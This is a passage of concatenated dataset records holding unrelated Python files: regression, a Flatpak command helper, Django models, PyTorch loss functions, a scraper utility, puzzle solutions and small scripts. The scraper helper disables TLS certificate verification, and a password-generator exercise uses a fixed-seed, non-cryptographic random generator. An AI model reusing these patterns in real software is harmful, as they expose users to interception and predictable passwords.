len(comp_index)\r\n\r\ndf = pd.DataFrame (data, columns=['x','y'])\r\ndf.plot(kind='scatter', x='x', y='y')\r\n\r\n# 
Gradient Descent Calculation \r\ndef new_theta_function (alpha, theta0, theta1, x, y):\r\n new_theta0 = float(theta0 - (alpha/num_rand_ints) * sum_theta_function_x(theta0, theta1, x, y))\r\n new_theta1 = float(theta1 - (alpha/num_rand_ints) * sum_theta_function_y(theta0, theta1, x, y))\r\n cost = (1/(2*num_rand_ints)) * sum_y_coordinates(theta0, theta1, x, y)\r\n print ([new_theta0, new_theta1, cost])\r\n return [new_theta0, new_theta1, cost]\r\n\r\n#sum((theta0 + theta1*x -y)*x)\r\ndef sum_theta_function_x (theta0, theta1, x, y):\r\n total = 0\r\n for index in range(0, num_rand_ints):\r\n total += float((theta0*x.iloc[index] + theta1 - y.iloc[index])*x.iloc[index])\r\n return total\r\n\r\n#sum(theta0 + theta1*x - y)\r\ndef sum_theta_function_y (theta0, theta1, x, y):\r\n total = 0\r\n for index in range(0, num_rand_ints):\r\n total += float(theta0*x.iloc[index] + theta1 - y.iloc[index])\r\n return total\r\n\r\ndef sum_y_coordinates (theta0, theta1, x, y):\r\n total = 0\r\n for index in range (0, num_rand_ints):\r\n total += (theta0*x.iloc[index] + theta1 - y.iloc[index])**2\r\n return total\r\n\r\n# Main\r\n# Lowest Cost Tracker\r\n[lowest_theta0, lowest_theta1, lowest_cost] = [0, 0, 0]\r\n\r\nprint (\"Computing theta0 and theta1 \" + str(num_interations_of_regression) + \" times, please wait.\")\r\nfor index in range(num_interations_of_regression):\r\n [theta0, theta1, cost] = new_theta_function(alpha, theta0, theta1, df.loc[:, 'x'], df.loc[:, 'y'])\r\n if index == 0:\r\n lowest_cost = cost\r\n if index > 0:\r\n if lowest_cost > cost:\r\n lowest_cost = cost\r\n lowest_theta0 = theta0\r\n lowest_theta1 = theta1\r\n\r\nprint(\"The best theta parameters based on the lowest cost of: \" + str(lowest_cost) + \" is theta0: \" + str(lowest_theta0) + \" and theta1: \" + str(lowest_theta1))\r\n","repo_name":"jhuy/toronto_housing_linear_regression","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39338992615","text":"import subprocess\nimport re\nimport asyncio\nimport threading\nfrom typing import Callable, List, Union\nfrom .utils import log\n\n_sanitizer = None\ndef sanitize(_input: str) -> str:\n global _sanitizer\n\n if not _sanitizer:\n _sanitizer = re.compile(r'[^0-9a-zA-Z]+')\n\n return re.sub(_sanitizer, \" \", _input)\n\ndef sh(command: Union[str, List[str]], return_stderr=False) -> str:\n to_check = command if isinstance(command, str) else ' '.join(command)\n\n try:\n log(f'Running {command}')\n\n cmd = f'flatpak-spawn --host {command}'.split(' ') if isinstance(command, str) else ['flatpak-spawn', '--host', *command]\n output = subprocess.run(cmd, encoding='utf-8', shell=False, check=True, capture_output=True)\n output.check_returncode()\n except subprocess.CalledProcessError as e:\n print(e.stderr)\n\n if return_stderr:\n return e.output\n\n raise e\n\n return re.sub(r'\\n$', '', output.stdout)\n\ndef threaded_sh(command: Union[str, List[str]], callback: Callable[[str], None]=None, return_stderr=False):\n to_check = command if isinstance(command, str) else command[0]\n\n def run_command(command: str, callback: Callable[[str], None]=None):\n try:\n output = sh(command, return_stderr)\n\n if callback:\n callback(re.sub(r'\\n$', '', output))\n\n except subprocess.CalledProcessError as e:\n log(e.stderr)\n raise e\n\n thread = threading.Thread(target=run_command, daemon=True, args=(command, callback, ))\n 
thread.start()","repo_name":"mijorus/boutique","sub_path":"src/lib/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"85"} +{"seq_id":"29067128084","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass AbstractQuestion(models.Model):\n question_number = models.IntegerField()\n question = models.CharField(max_length=100)\n\n class Meta:\n abstract = True\n\n def __str__(self):\n return self.question\n\n\nclass BooleanQuestion(AbstractQuestion):\n pass\n\nclass TheoryQuestion(AbstractQuestion):\n pass\n\n\nclass BooleanQuestionAnswer(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='boolean_questions'\n )\n question = models.ForeignKey(\n BooleanQuestion,\n on_delete=models.CASCADE,\n related_name='questions'\n )\n answer = models.BooleanField()\n\nclass TheoryQuestionAnswer(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='theory_questions'\n )\n question = models.ForeignKey(\n TheoryQuestion,\n on_delete=models.CASCADE,\n related_name='questions'\n )\n answer = models.TextField()\n\n\nclass MultipleChoiceQuestionOption(models.Model):\n option = models.CharField(max_length=100)\n\n def __str__(self):\n return self.option\n\n\nclass MultipleChoiceQuestion(AbstractQuestion):\n options = models.ManyToManyField(\n MultipleChoiceQuestionOption,\n related_name='options'\n )\n\n\nclass MultipleChoiceQuestionAnswer(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='multiple_choice_questions'\n )\n question = models.ForeignKey(\n MultipleChoiceQuestion,\n on_delete=models.CASCADE,\n related_name='questions'\n )\n answer = models.ForeignKey(\n MultipleChoiceQuestionOption,\n on_delete=models.CASCADE,\n related_name='answers'\n )","repo_name":"ebinabo/metamorphosis","sub_path":"quiz/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"11395022371","text":"# coding=utf-8\r\n\r\nimport requests\r\nfrom retrying import retry\r\n\r\nheaders = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\"}\r\n\r\n# 尝试3次请求\r\n@retry(stop_max_attempt_number=10)\r\ndef _parse_url(url, method, data, proxies):\r\n '''解析url'''\r\n print('*'*30)\r\n\r\n if method == 'POST':\r\n response = requests.post(url, headers=headers, data=data, proxies=proxies,verify=False)\r\n else:\r\n response = requests.get(url, headers=headers, timeout=3, proxies=proxies, verify=False)\r\n\r\n assert response.status_code == 200\r\n\r\n return response.content.decode()\r\n\r\n\r\ndef parse_url(url, method='GET',data=None, proxies={}):\r\n try:\r\n html_str = _parse_url(url, method, data, proxies)\r\n\r\n except:\r\n html_str = None\r\n\r\n return html_str\r\n\r\n\r\nif __name__ == '__main__':\r\n url = 'https://www.baidu.com'\r\n print(parse_url(url))","repo_name":"giant-xf/myspider","sub_path":"7.0-爬虫(spider)/7.01-通用爬虫模块使用/parse_url.py","file_name":"parse_url.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33589615188","text":"import torch.nn as nn\nimport torch as th\nimport torch.nn.functional as F\nimport 
torch\nimport numpy as np\nfrom torch.autograd import Variable\nimport ot\n\nclass PartialOrderLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=28, gamma=1.0, p= 0.05):\n super().__init__()\n self.margin1 = margin\n self.margin2 = margin2\n self.caption_count = caption_count\n self.p = p\n \n \n def forward(self, dist, labels):\n # print('------------------------------------------------------')\n # print('margins', self.margin1, self.margin2)\n # print('dist shape', dist.shape, dist)\n # print(labels)\n zeros_helper = torch.zeros(dist.shape).cuda()\n scores=dist.cuda()\n #print('substracted score shape', scores[:,0].view(scores.size(0),1).shape)\n scores = scores-scores[:,0].view(scores.size(0),1).expand_as(scores)\n #print('scores shape', scores.shape, scores)\n part = torch.where(labels==0, (-self.p-scores).clamp(min=0) + scores.clamp(min=0), zeros_helper).clamp(min=0)\n part1 = torch.where((labels==1) | (labels==2), (self.margin1+scores).clamp(min=0) + (-scores-self.margin2).clamp(min=0), zeros_helper).clamp(min=0)\n part2 = torch.where(labels==3, (self.margin2+scores), zeros_helper).clamp(min=0)\n #print('part1, part2',part1.shape, part2.shape, part1, part2)\n scores = dist[:,self.caption_count:].cuda()\n diagonal = scores.diag().view(scores.size(0), 1)\n d = diagonal.t().expand_as(scores)\n scores = scores - d\n #print('scores shape', scores.shape, scores)\n part3 = (self.margin2+scores).clamp(min=0)\n #print('part3 shape', part3.shape, part3)\n mask = torch.eye(scores.size(0)).cuda() > 0.5\n part3 = part3.masked_fill_(mask,0)\n #print('part3 shape', part3.shape, part3)\n Loss = part1.mean()+part2.mean()+part.mean()+part3.mean()\n return Loss\n \nclass OTPartialOrderLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=21, gamma=1.0, p= 0.02):\n super().__init__()\n self.margin1 = margin\n self.margin2 = margin2\n self.caption_count = caption_count\n self.p = p\n self.gamma = gamma\n #def compute_loss(self, scores):\n \n \n def forward(self, dist, labels):\n zeros_helper = torch.zeros(dist.shape).cuda()\n scores=dist.cuda()\n scores = scores-scores[:,0].view(scores.size(0),1).expand_as(scores)\n groundMetric0 = torch.nn.functional.relu(-self.p - scores)+torch.nn.functional.relu(scores)\n groundMetric1 = torch.nn.functional.relu(self.margin1 + scores)\n groundMetric2 = torch.nn.functional.relu(-self.margin2 - scores)\n groundMetric3 = torch.nn.functional.relu(self.margin2 + scores)\n GM0 = (labels==0).cuda().float().mul(groundMetric0)\n GM1 = ((labels==1) | (labels==2)).cuda().float().mul(groundMetric1)\n GM2 = (((labels==1) | (labels==2))).cuda().float().mul(groundMetric2)# why not 1 or 2 result better without not \n GM3 = (labels==3).cuda().float().mul(groundMetric3)\n GM=GM0+GM1+GM2+GM3\n # GM=(~(labels==0)).cuda().float().mul(GM)#why prune label zero losss\n expGM = torch.exp(-self.gamma * GM)\n GMFlatten = expGM.view(-1)\n\n uuu = np.ones([dist.size(0)]) / dist.size(0)\n vvv = np.ones([dist.size(1)]) / dist.size(1)\n reg = (-1) / 5\n expGM_numpy = expGM.cpu().detach().numpy()\n \n T = torch.from_numpy(ot.sinkhorn(uuu, vvv, expGM_numpy, reg, numItermax=50)).cuda().float()\n # T = (~(labels==0)).cuda().float().mul(T) why remove label 0\n Tsum = T.sum(dim=1).view(-1,1)\n T = T/Tsum\n T_Flatten = torch.autograd.Variable(T.view(-1)).float().cuda()\n\n loss1 = GM.view(-1).mul(T_Flatten).mean()\n \n\n scores = dist[:,self.caption_count:].cuda()\n diagonal = scores.diag().view(scores.size(0), 1)\n d = 
diagonal.t().expand_as(scores)\n scores = scores - d\n \n \n \n \n target_train = torch.eye(scores.size(0)).cuda()\n \n hinge_groundMetric = torch.nn.functional.relu(self.margin2 + scores)\n Pos_groundMetric = torch.nn.functional.relu(-0.5-scores)\n GM_PositivePair = target_train.mul(Pos_groundMetric)\n\n GM_NegativePair = (1 - target_train).mul(hinge_groundMetric)\n GM = GM_PositivePair + GM_NegativePair\n GM = GM.masked_fill_(target_train>0.5,0)\n GMF = GM.view(-1)\n \n expGM = torch.exp(-self.gamma * GM)\n\n GMFlatten = expGM.view(-1)\n\n uuu = np.ones([scores.size(0)]) / scores.size(0)\n vvv = np.ones([scores.size(1)]) / scores.size(1)\n reg = (-1) / 5\n expGM_numpy = expGM.cpu().detach().numpy()\n # print('I am busy at computing sinkhorn')\n # sys.stdout.flush()\n \n scores = target_train.mul((-0.5-scores).clamp(min=0)) + (1-target_train).mul((self.margin2+scores).clamp(min=0))\n T = torch.from_numpy(ot.sinkhorn(uuu, vvv, expGM_numpy, reg, numItermax=50)).cuda()\n T = T.masked_fill_(target_train>0.5, 0)\n Tsum = T.sum(dim=1).view(-1,1)\n T = T/Tsum \n T_Flatten = torch.autograd.Variable(T.view(-1)).float().cuda()\n loss2 = scores.view(-1).mul(T_Flatten).mean()\n \n Loss = loss1+loss2\n return Loss\n \n \n\n\nclass OptimalTransportLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=28, gamma=1.0, p= 0.05):\n super().__init__()\n self.margin = margin\n self.caption_count = caption_count\n self.gamma = gamma\n def optimal_transport(self, dist,labels):\n dist=dist.cuda()\n # print(dist.size(0))\n # print(dist.size(1))\n if dist.size(0) < dist.size(1):\n captions_per_video = int(dist.size(1)/dist.size(0))\n diagonal_mask = torch.eye(dist.size(0)).repeat(1,captions_per_video).cuda()\n reweight_mask = diagonal_mask.clone()\n reweight_mask[:,:dist.size(0)]=1\n else:\n captions_per_video = int(dist.size(0)/dist.size(1))\n diagonal_mask = torch.eye(dist.size(1)).repeat(captions_per_video,1).cuda()\n\n diagonal = diagonal_mask*dist\n diagonal.masked_fill_(diagonal_mask < 0.5, -1e28)\n max_diagonal, max_inds = diagonal.max(dim=1)\n d1 = max_diagonal.view(-1,1).expand_as(dist)\n\n\n target_train = diagonal_mask\n maxelement_mask = torch.zeros(dist.size()).cuda()\n maxelement_mask[torch.arange(dist.size(0)),max_inds] = 1\n bsz = dist.size(0)\n\n #target = torch.from_numpy(np.arange(0,bsz)).float().cuda()\n #target = target.view(target.size(0), 1)\n #target_train = (target == torch.transpose(target, 0, 1)).float().cuda()\n\n\n hinge_groundMetric = torch.nn.functional.relu(self.margin + dist - d1)\n Pos_groundMetric = torch.nn.functional.relu(-0.5-dist+d1)\n GM_PositivePair = target_train.mul(Pos_groundMetric)\n\n GM_NegativePair = (1 - target_train).mul(hinge_groundMetric)\n GM = GM_PositivePair + GM_NegativePair\n GM = GM.masked_fill_(target_train>0.5,0)\n GMF = GM.view(-1)\n \n expGM = torch.exp(-self.gamma * GM)\n\n GMFlatten = expGM.view(-1)\n\n uuu = np.ones([dist.size(0)]) / dist.size(0)\n vvv = np.ones([dist.size(1)]) / dist.size(1)\n reg = (-1) / 5\n expGM_numpy = expGM.cpu().detach().numpy()\n # print('I am busy at computing sinkhorn')\n # sys.stdout.flush()\n \n dist = target_train.mul((-0.5-dist+d1).clamp(min=0)) + (1-target_train).mul((self.margin+dist-d1).clamp(min=0))\n T = torch.from_numpy(ot.sinkhorn(uuu, vvv, expGM_numpy, reg, numItermax=50)).cuda()\n T = T.masked_fill_(maxelement_mask>0.5, 0)\n Tsum = T.sum(dim=1).view(-1,1)\n T = T/Tsum\n if dist.size(0) < dist.size(1):\n T = T.masked_fill_(reweight_mask<0.5, 0)\n Tsum = 
T.sum(dim=1).view(-1,1)\n T = T/Tsum#dist = dist.masked_fill_(I, 0)\n T_Flatten = torch.autograd.Variable(T.view(-1)).float().cuda()\n \n loss = torch.sum(dist.view(-1).mul(T_Flatten))\n\n return loss\n def forward(self, dist, labels):\n dist=dist[:,self.caption_count:]\n return self.optimal_transport(dist,labels)+self.optimal_transport(dist.t(),labels)\n\n\nclass MaxMarginRankingLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=28, gamma=1.0, p= 0.05):\n super().__init__()\n self.fix_norm = fix_norm\n self.loss = th.nn.MarginRankingLoss(margin)\n self.margin = margin\n self.caption_count = caption_count\n def forward(self, x, labels):\n x = x[:,self.caption_count:]\n #print(x.shape)\n #exit()\n n = x.size()[0]\n\n x1 = th.diag(x)\n x1 = x1.unsqueeze(1)\n x1 = x1.expand(n, n)\n x1 = x1.contiguous().view(-1, 1)\n x1 = th.cat((x1, x1), 0)\n\n x2 = x.contiguous().view(-1, 1)\n x3 = x.transpose(0, 1).contiguous().view(-1, 1)\n x2 = th.cat((x2, x3), 0)\n max_margin = F.relu(self.margin - (x1 - x2))\n\n if self.fix_norm:\n # remove the elements from the diagonal\n keep = th.ones(x.shape) - th.eye(x.shape[0]) # 128 x 128\n keep1 = keep.view(-1, 1)\n keep2 = keep.transpose(0, 1).contiguous().view(-1, 1)\n keep_idx = th.nonzero(th.cat((keep1, keep2), 0).flatten()).flatten()\n if x1.is_cuda:\n keep_idx = keep_idx.cuda()\n x1_ = th.index_select(x1, dim=0, index=keep_idx)\n x2_ = th.index_select(x2, dim=0, index=keep_idx)\n max_margin = F.relu(self.margin - (x1_ - x2_))\n\n return max_margin.mean()\n\nclass DistanceWeightedLoss(nn.Module):\n\n def __init__(self,margin=0.09,margin2=0.09,fix_norm=True, caption_count=21, gamma=1.0, p= 0.02):\n super().__init__()\n self.margin = 0.09\n self.nonzero_loss_cutoff = self.margin\n self.cutoff = -0.03\n self.caption_count = caption_count\n\n def forward(self, x, labels):\n gt = -x[:,0]+1\n x = x[:,self.caption_count:]\n n = x.size()[0]\n d = x.size()[1]\n\n zeros_helper = torch.zeros(x.shape).cuda()\n ones_helper = torch.ones(x.shape).cuda()\n scores = -x.cuda()+1\n distance = scores.cuda()\n scores_temp = torch.where(distance - gt.view(scores.size(0),1).expand_as(scores) < self.cutoff, zeros_helper+1e-10, distance)\n log_weights = ((2.0 - float(d)) * torch.log(scores_temp) - (float(d - 3) / 2) * torch.log(1.0 - 0.25 * (scores_temp ** 2.0)))\n weights = torch.exp(log_weights - torch.max(log_weights))\n mask = (1-torch.eye(n)).cuda()\n weights = weights * mask * torch.where(distance - gt.view(scores.size(0),1).expand_as(scores) > self.nonzero_loss_cutoff, ones_helper, zeros_helper+1e-10)\n weights = weights / (torch.sum(weights, dim=1, keepdim=True)+1e-10)\n loss = torch.ones(n).cuda()\n np_weights = weights.cpu().detach().numpy()\n for i in range(n):\n try:\n idx = np.random.choice(n, 5, p=np_weights[i]).tolist()\n for j in idx:\n loss[i] += (self.margin + distance[i][i] - distance[i][j]).clamp(min=0)\n except:\n idx = np.random.choice(n, 5).tolist()\n for j in idx:\n loss[i] += (self.margin + distance[i][i] - distance[i][j]).clamp(min=0)\n \n distance = scores.t().cuda()\n scores_temp = torch.where(distance - gt.view(scores.size(0),1).expand_as(scores) < self.cutoff, zeros_helper+1e-10, distance)\n log_weights = ((2.0 - float(d)) * torch.log(scores_temp) - (float(d - 3) / 2) * torch.log(1.0 - 0.25 * (scores_temp ** 2.0)))\n weights = torch.exp(log_weights - torch.max(log_weights))\n mask = (1-torch.eye(n)).cuda()\n weights = weights * mask * torch.where(distance - gt.view(scores.size(0),1).expand_as(scores) > 
self.nonzero_loss_cutoff, ones_helper, zeros_helper+1e-10)\n weights = weights / (torch.sum(weights, dim=1, keepdim=True)+1e-10)\n loss1 = torch.ones(n).cuda()\n np_weights = weights.cpu().detach().numpy()\n for i in range(n):\n try:\n idx = np.random.choice(n, 10, p=np_weights[i]).tolist()\n for j in idx:\n loss1[i] += (self.margin + distance[i][i] - distance[i][j]).clamp(min=0)\n except:\n idx = np.random.choice(n, 10).tolist()\n for j in idx:\n loss1[i] += (self.margin + distance[i][i] - distance[i][j]).clamp(min=0)\n \n return loss.mean()+loss1.mean()\n\n\nclass QuadrupletLoss(nn.Module):\n def __init__(self,margin=0.05,margin2=0.09,fix_norm=True, caption_count=28, gamma=1.0, p= 0.05):\n super().__init__()\n self.margin1 = margin\n self.margin2 = margin2\n self.caption_count = caption_count\n \n \n def forward(self, dist, labels):\n zeros_helper = torch.zeros(dist.shape).cuda()\n scores=dist.cuda()\n # for p+ and p-\n # Dap-\n temp = torch.max(torch.where((labels==1) or (labels==2), scores, zeros_helper)) - scores[:,0]\n # Dap+\n score_temp = scores[:, 0] = 2\n temp1 = torch.min(torch.where((labels==0), score_temp[:, :self.caption_count], zeros_helper[:, :self.caption_count]))\n temp2 = torch.where(temp1==0, 1, temp1) - scores[:,0]\n loss1 = (self.margin2-self.margin1+temp2-temp)/(temp2+self.margin2-self.margin1)\n loss1 = loss1.clamp(min=0)\n \n # for p- and n\n # Dan\n temp3 = torch.max(torch.where((labels==3), scores, zeros_helper)) - scores[:,0] \n # Dap-\n temp4 = torch.min(torch.where((labels==1) or (labels==2), scores, zeros_helper))\n temp5 = torch.where(temp4==0, 1, temp4) - scores[:,0]\n loss2 = (self.margin1+temp5-temp3)/(temp5+self.margin1)\n loss2 = loss2.clamp(min=0)\n\n return loss1.mean()+loss2.mean()\n\n\nclass BCEWithLogitsLoss(nn.Module):\n\n def __init__(self, weight=None):\n super().__init__()\n self.loss = th.nn.BCEWithLogitsLoss(weight=weight)\n\n def forward(self, x, target):\n return self.loss(x, target)\n\n\nclass CrossEntropyLoss(nn.Module):\n\n def __init__(self, weight=None):\n super().__init__()\n self.loss = th.nn.CrossEntropyLoss(weight=weight)\n\n def forward(self, x, target):\n return self.loss(x, target.long().to(x.device))\n\n\nif __name__ == \"__main__\":\n loss = BCEWithLogitsLoss()\n x = th.randn(3, requires_grad=True)\n target = th.empty(3).random_(2)\n output = loss(x, target)\n output.backward()\n print(target)\n","repo_name":"nshubham655/RUDDER","sub_path":"codebase/model/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":14976,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"1638607573","text":"TITLE = \"JumpCat!\"\nWIDTH = 480\nHEIGHT = 600\nFPS = 60\nFONT_NAME = 'arial'\nHS_FILE = \"highscore.txt\"\n\n# Аудио файлы\nSTART_SCREEN_MUSIC = \"start.ogg\"\nBACKGROUND_MUSIC = \"background.ogg\"\nGAME_OVER_MUSIC = \"game_over.wav\"\n\n# Параметры игрока\nPLAYER_ACC = 0.5\nPLAYER_FRICTION = -0.12\nPLAYER_GRAV = 0.8\nPLAYER_JUMP = 24\n\n# Параметры игры\nBOOST_POWER = 60\nACCELERATOR_SPAWN_CHANGE = 5\nENEMIES_SPAWN_TIME = 5000\n\n# Стартовые платформы\nPLATFORM_LIST = [(0, HEIGHT - 40),\n (WIDTH / 2 - 50, HEIGHT * 3 / 4),\n (125, HEIGHT - 350),\n (350, 200),\n (175, 100)]\n\n# Цвета\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nLIGHTBLUE = (0, 175, 255)\nBGCOLOR = 
LIGHTBLUE","repo_name":"Goddo-ro/Jumpets","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"72787711318","text":"#Test5.1.py\nimport random\n\ndef genpwd(length):\n val = random.randint(10**(length-1),10**length-1)\n return val\n\nlength = eval(input())\nrandom.seed(17)\nfor i in range(3):\n print(genpwd(length))\n","repo_name":"ZYM1111/Pycharm_Python","sub_path":"Test5.1.py","file_name":"Test5.1.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20711105856","text":"#!/usr/bin/python\n\n\nimport logging\n\nlogger = logging.getLogger()\n\nhan = logging.FileHandler('log1.log')\n\nformat = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\nhan.setFormatter(format)\n\nlogger.addHandler(han)\n\nlogmessage = \"Testing message in python\"\n\nlogger.error(logmessage)\n\n","repo_name":"scriptedinstalls/Scripts","sub_path":"python/logs/log1.py","file_name":"log1.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8889650521","text":"from string import ascii_lowercase\nimport heapq\n\nroutes = open('input').read().split('\\n')\ngrid = [list(route) for route in routes]\nlength = len(grid)\nheight = len(grid[0])\nvisited = [[False]*height for i in range(length)] # all coordinates in grid must be False, for visited nodes durther down\n\ndef check_allowed_climb_height(letter):\n if letter == \"S\":\n return 0 # elevatiion of a\n elif letter == \"E\":\n return 25 # elevation of z\n elif letter in ascii_lowercase:\n return ascii_lowercase.index(letter)\n else:\n return None # this shouldn't happen\n\ndef check_neighbours(pos_x, pos_y):\n directions = [[1,0], [0,1], [-1,0], [0,-1]] # can either go one step to left, right, up or down from current pos_x, pos_y\n for dir in directions:\n x, y = dir[0], dir[1]\n\n neighbour_x = x + pos_x\n neighbour_y = y + pos_y\n\n if not(length > neighbour_x >= 0 and height > neighbour_y >= 0): # outside of grid to right-most, left-most, upper or furthest down part of the grid\n continue # is outside with current coordinates, just continue to avoid indexing problems\n if check_allowed_climb_height(grid[neighbour_x][neighbour_y]) - check_allowed_climb_height(grid[pos_x][pos_y]) >= -1: # check if index of ascii_lowercase is at most one higher than current elevation\n yield neighbour_x, neighbour_y # to check all four directions\n\nfor i in range(length):\n for j in range(height):\n if grid[i][j] == \"S\": # start\n start = i,j\n if grid[i][j] == \"E\": # end\n end = i,j\n\n\"\"\"\nPart 2 works a bit different from Part 1. Here the easiest way to find the End point from 'a' is to\nstart from the End point E and find the closest 'a' instead of iterating through every 'a' in the grid.\nWith this said, the first element in the heap have the coordinates for the End point E. To find 'a'\nwe instead change our if-statement to return True if the height helper-function returns the ascii_lowercase\nindex of the letter 'a' which is our destination. 
If that is found we return the new minimum steps.\n\"\"\"\ncurr = [(0, end[0], end[1])]\nminimum_steps = 0\nwhile True:\n steps, x, y = heapq.heappop(curr)\n\n if visited[x][y] != False:\n continue\n\n if check_allowed_climb_height(grid[x][y]) == ascii_lowercase.index('a'): # iteration done through Dijkstras algorithm, minimum_steps found when 'a' is found\n minimum_steps = steps\n break\n\n visited[x][y] = True\n\n for neighbour_x, neighbour_y in check_neighbours(x, y): # returns all possible neighbours and adds them to heap, picks the smallest further up\n heapq.heappush(curr, (steps + 1, neighbour_x, neighbour_y))\n\nprint(minimum_steps)\n","repo_name":"Stronkness/Advent-Of-Code","sub_path":"2022/12/day12_2.py","file_name":"day12_2.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7077327652","text":"class Solution:\n\tdef find(self,Input,rule,turn):\n\t\tM1=Input\n\t\trule=[1 if rule[i]=='alive' else 0 for i in range(len(rule))]\n\t\tfor i in range(turn):\n\t\t\tM1=self.Calculate_live(Input)\n\t\t\tM2=self.Calculate_new(M1,rule)\n\n\t\t\tInput=M2\n\t\treturn Input\n\n\n\tdef Calculate_live(self,Input):\n\t\tN=[[0,0,0,0],[0,0,0,0]]\n\t\tN[0][0]=Input[0][1]+Input[1][0]+Input[1][1]\n\t\tN[0][1]=Input[0][0]+Input[1][1]+Input[1][0]+Input[0][2]+Input[1][2]\n\t\tN[0][2]=Input[0][3]+Input[0][1]+Input[1][1]+Input[1][2]+Input[1][3]\n\t\tN[0][3]=Input[0][2]+Input[1][2]+Input[1][3]\n\t\tN[1][0]=Input[0][0]+Input[0][1]+Input[1][1]\n\t\tN[1][1]=Input[0][0]+Input[0][1]+Input[1][0]+Input[0][2]+Input[1][2]\n\t\tN[1][2]=Input[0][3]+Input[0][1]+Input[1][1]+Input[0][2]+Input[1][3]\n\t\tN[1][3]=Input[0][2]+Input[1][2]+Input[0][3]\n\t\treturn N\n\n\tdef Calculate_new(self,M1,rule):\n\t\t#print(M1)\n\t\tfor i in range(2):\n\t\t\tfor j in range(4):\n\t\t\t\t#print(i,j)\n\t\t\t\tM1[i][j]=rule[M1[i][j]]\n\t\treturn M1\n\n\n\ns= Solution()\nprint(s.find([[0, 1, 1, 0], [1, 1, 0, 0]],[\"dead\", \"dead\", \"dead\", \"alive\", \"dead\", \"alive\", \"dead\", \"dead\", \"dead\"],2))\n\n\n","repo_name":"Sarthak67/leisure_coding","sub_path":"gird.py","file_name":"gird.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"25043463672","text":"\r\n#f_read = open(\"resdata.txt\",'r');\r\n#f_write = open(\"data3.txt\",'w');\r\n#\r\n# i=0\r\n# res = ''\r\n#\r\n# for i in range (0, 8010):\r\n# \tf_read = open(\"resdata.txt\", 'r');\r\n# \tk = i\r\n# \twhile k != 0:\r\n# \t\ttemp = f_read.readline()[:-3]\r\n# \t\tk -= 1\r\n#\r\n# \tfor j in range(0, 29):\r\n# \t\tres += f_read.readline()[:-1]\r\n# \tres += f_read.readline()[:-2]\r\n# \tf_write.write(res+'\\n')\r\n# \tres = ''\r\n# \tf_read.close();\r\n# f_write.close();\r\n\r\n# File Writer\r\n\r\nimport collections\r\n\r\nbuffers = collections.deque([])\r\nlabel = collections.deque([])\r\n\r\nf_read = open(\"data.txt\", 'r');\r\nf = open(\"data5.txt\", 'w')\r\n\r\nwhile(True) :\r\n data = \"\"\r\n data = f_read.readline()[:]\r\n print(data)\r\n #if(data[-3]==6):\r\n\t# continue\r\n\r\n data_f = data.split(\"/\")\r\n #print(data_f[3])\r\n label_ = int(data_f[3])\r\n if(len(buffers) < 90) :\r\n #buffers.append(data_f[:3])\r\n label.append(label_)\r\n for i in range(3):\r\n buffers.append(str(data_f[i]))\r\n else :\r\n send_data = \"\"\r\n avg_label = 0\r\n for i in range(90):\r\n send_data += (str(buffers[i]) + \" \")\r\n if(i%3==0):\r\n avg_label += label[int(i/3)]\r\n\r\n 
avg_label = round(avg_label / 30)\r\n buffers.popleft()\r\n buffers.popleft()\r\n buffers.popleft()\r\n # buffers.append(str(data_f[:3]))\r\n for i in range(3):\r\n buffers.append(str(data_f[i]))\r\n label.popleft()\r\n label.append(label_)\r\n send_data += str(avg_label)\r\n f.write(send_data + \"\\n\")\r\nf_read.close()\r\nf.close()\r\n","repo_name":"GMPACE/TORCS","sub_path":"src/predictor/reshape.py","file_name":"reshape.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"13936469814","text":"\"\"\"\nCreated on Fri Apr 9 2021\n\n@author: Juan Cervino\n\"\"\"\n\nimport numpy as np\n\nclass GFT:\n def __init__(self,S):\n self.S=S\n [self.eigs,self.V]=np.linalg.eig(S)\n self.V=self.V[:,np.argsort(self.eigs)]\n self.eigs=np.sort(self.eigs)\n self.Lambda=np.diag(self.eigs)\n\n def 